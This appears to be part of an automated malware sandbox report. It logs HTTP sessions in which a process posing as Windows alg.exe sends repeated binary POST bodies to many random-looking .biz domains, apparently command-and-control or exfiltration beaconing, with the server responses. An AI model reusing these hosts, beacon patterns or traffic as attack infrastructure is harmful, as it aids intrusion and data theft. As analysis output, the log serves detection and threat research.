                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:40.150809050 CET | 778 | OUT | Data Raw: 78 af eb 02 0b f4 5a 32 fe 02 00 00 b1 b0 8a c8 11 2d 45 c2 d3 3a a5 a2 cd 05 06 23 8f c3 52 99 19 1f 64 c3 e8 4c 95 1f e8 be 47 e8 fb 31 b1 3d 7d a2 90 36 cc 7e 8b 9c a9 6c e7 c0 dc 5f af cc 03 f0 8c 75 f0 fd fa 2f 5f de db d4 0a ad 1f 65 53 16
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: xZ2-E:#RdLG1=}6~l_u/_eS[Rn<@fkJe(`gxuR.2U=N4B0+|jq!J!FFK/Vl43ogtF(mcoqj4to:RDpZ^^0Z]fi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49758 | 34.246.200.160 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:40.970911026 CET | 354 | OUT | POST /cxtfkubsyhri HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:40.970940113 CET | 778 | OUT | Data: binary payload
Oct 28, 2024 16:37:41.938535929 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:37:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5f30d4eb6048a30e890fae202c76ba6c|155.94.241.188|1730129861|1730129861|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49759 | 18.208.156.248 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:42.098999023 CET | 355 | OUT | POST /tocvykftorkpni HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:42.099028111 CET | 778 | OUT | Data: binary payload
Oct 28, 2024 16:37:42.759949923 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:37:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8e6981cd0901ea916568cf3c8fe5f088|155.94.241.188|1730129862|1730129862|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49760 | 208.100.26.245 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:42.902729034 CET | 349 | OUT | POST /mmdfp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:42.902765989 CET | 778 | OUT | Data: binary payload
Oct 28, 2024 16:37:43.534274101 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:37:43 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 28, 2024 16:37:43.555001020 CET | 350 | OUT | POST /yhdmpa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:43.555073023 CET | 778 | OUT | Data: binary payload
Oct 28, 2024 16:37:43.699248075 CET  744  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
25          192.168.2.4  49761        13.251.16.150   80                6732  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:37:43.963346004 CET  356  OUT  POST /tjrtnokwwlpftv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:43.963610888 CET  778  OUT
Oct 28, 2024 16:37:45.398087025 CET  414  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fffb985ec9a7770d1d973c54f5ab158e|155.94.241.188|1730129865|1730129865|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.4  49762        44.221.84.105   80                6732  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:37:45.554348946 CET  350  OUT  POST /wfwpk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:45.554375887 CET  778  OUT
Oct 28, 2024 16:37:46.224875927 CET  417  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8bbb7932b102c2eb2bcff075fef0ac7b|155.94.241.188|1730129866|1730129866|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.4  49763        54.244.188.177  80                6732  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:37:46.329646111 CET  360  OUT  POST /arnrrfwlvkgxeufd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:46.329866886 CET  778  OUT
Oct 28, 2024 16:37:47.151242971 CET  416  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b12624e9a0abc354287fcbcd6f4afc96|155.94.241.188|1730129867|1730129867|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
28          192.168.2.4  49764        35.164.78.200   80                6732  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:37:48.697072983 CET  357  OUT  POST /ckfgkmbjfmpkxgr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.697103977 CET778OUTData Raw: 4d 2b a5 e6 44 35 ef 0d fe 02 00 00 87 9e 07 2d e2 56 9e ed e1 ca 5e 4e e5 d7 e6 ae 92 78 1e 9a 52 5a ce 40 f3 d2 6f d6 25 8a 74 ae 0f d9 3e 38 24 1c 05 c7 b0 82 04 9e 39 d0 54 f0 a1 27 aa ef 4f 32 c2 cd 00 8e c5 f1 79 23 0c 7e df 3d 3c 66 b5 8c
Oct 28, 2024 16:37:49.533227921 CET  414  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=6f8db1932632d1d3c4504fb5a58a1adb|155.94.241.188|1730129869|1730129869|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
29          192.168.2.4  49765        3.94.10.34      80                6732  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:37:49.795176983 CET  356  OUT  POST /dneetrunpbg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.795200109 CET778OUTData Raw: 89 3a a6 d7 1a 3c c5 50 fe 02 00 00 93 b8 f0 b5 87 33 0b 4d 52 35 04 a0 f1 30 d3 5e 8b eb e8 ed ab 98 e5 9c 85 39 51 1e 1e 40 a9 a1 ba d9 db 5e 45 b0 40 82 4e bd 0a b3 f6 c2 7b b8 96 d9 75 28 62 44 d5 a0 3a 88 e1 bc 91 18 a3 14 be 46 97 84 25 07
Oct 28, 2024 16:37:50.469099998 CET  417  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d32c61658022c84a5423750ac11fcc6a|155.94.241.188|1730129870|1730129870|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
30          192.168.2.4  49766        165.160.15.20   80                6732  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:37:50.618063927 CET  343  OUT  POST /vr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.618099928 CET778OUTData Raw: 65 02 71 7e be 7b bb c3 fe 02 00 00 28 e4 76 17 7d b2 9a ab bf 0f 02 e0 4b 62 e1 9a a3 61 0e 2e fb 23 15 ab 18 68 32 63 e2 83 e0 11 29 3c f8 24 33 66 63 82 c2 0f 36 33 3a ab 39 d0 b1 fe b8 72 f0 02 0c 37 f5 51 20 c0 53 82 57 ac 86 38 f5 60 d7 23
Oct 28, 2024 16:37:51.321888924 CET  170  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Oct 28, 2024 16:37:51.514925003 CET  348  OUT  POST /euqwoqq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:51.514952898 CET | 778 | OUT | Data: binary request body
Oct 28, 2024 16:37:51.691634893 CET | 170 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 15:37:51 GMT
Content-Length: 94
Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49767 | 54.244.188.177 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:51.920543909 CET | 351 | OUT | POST /ibecst HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:51.920604944 CET | 778 | OUT | Data: binary request body
Oct 28, 2024 16:37:52.761270046 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:37:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3a4f0303823c69251ccc02a697680a3f|155.94.241.188|1730129872|1730129872|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49768 | 208.100.26.245 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:52.966738939 CET | 345 | OUT | POST /mi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:52.966738939 CET | 778 | OUT | Data: binary request body
Oct 28, 2024 16:37:53.653592110 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:37:53 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 28, 2024 16:37:53.696023941 CET | 351 | OUT | POST /nmaggyam HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:53.696077108 CET | 778 | OUT | Data: binary request body
Oct 28, 2024 16:37:53.844095945 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:37:53 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49769 | 34.211.97.45 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:54.126360893 CET | 351 | OUT | POST /cmntnmriuw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:54.126410007 CET | 778 | OUT | Data Raw: 35 81 d6 98 c5 d1 21 46 fe 02 00 00 ac 4d 38 4c 40 f7 37 f4 97 5b a1 8b 0e ef f2 68 92 c4 3d 56 4d bc dd ae 38 9f 1b 5a 47 10 c7 b7 e4 b3 96 64 2b 0a f1 65 ed a7 db 44 39 db e9 de b3 41 3e 0c 91 f7 c4 4c b4 41 46 62 8e c4 8d 8b 33 ed 6d 1d 12 0f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5!FM8L@7[h=VM8ZGd+eD9A>LAFb3mD^,dXZ{6JmUu0lzfKZ?RaQrSY0If\T*+"qYeg+#gjt`rgbRR}Kq/Z%sX4$+zvQPN&
Oct 28, 2024 16:37:55.174616098 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=9b5754bad3bc5ec87dbfd36291225ec3|155.94.241.188|1730129874|1730129874|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49770 | 54.244.188.177 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:55.391169071 CET | 358 | OUT | POST /mrsvwgseskwgtc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
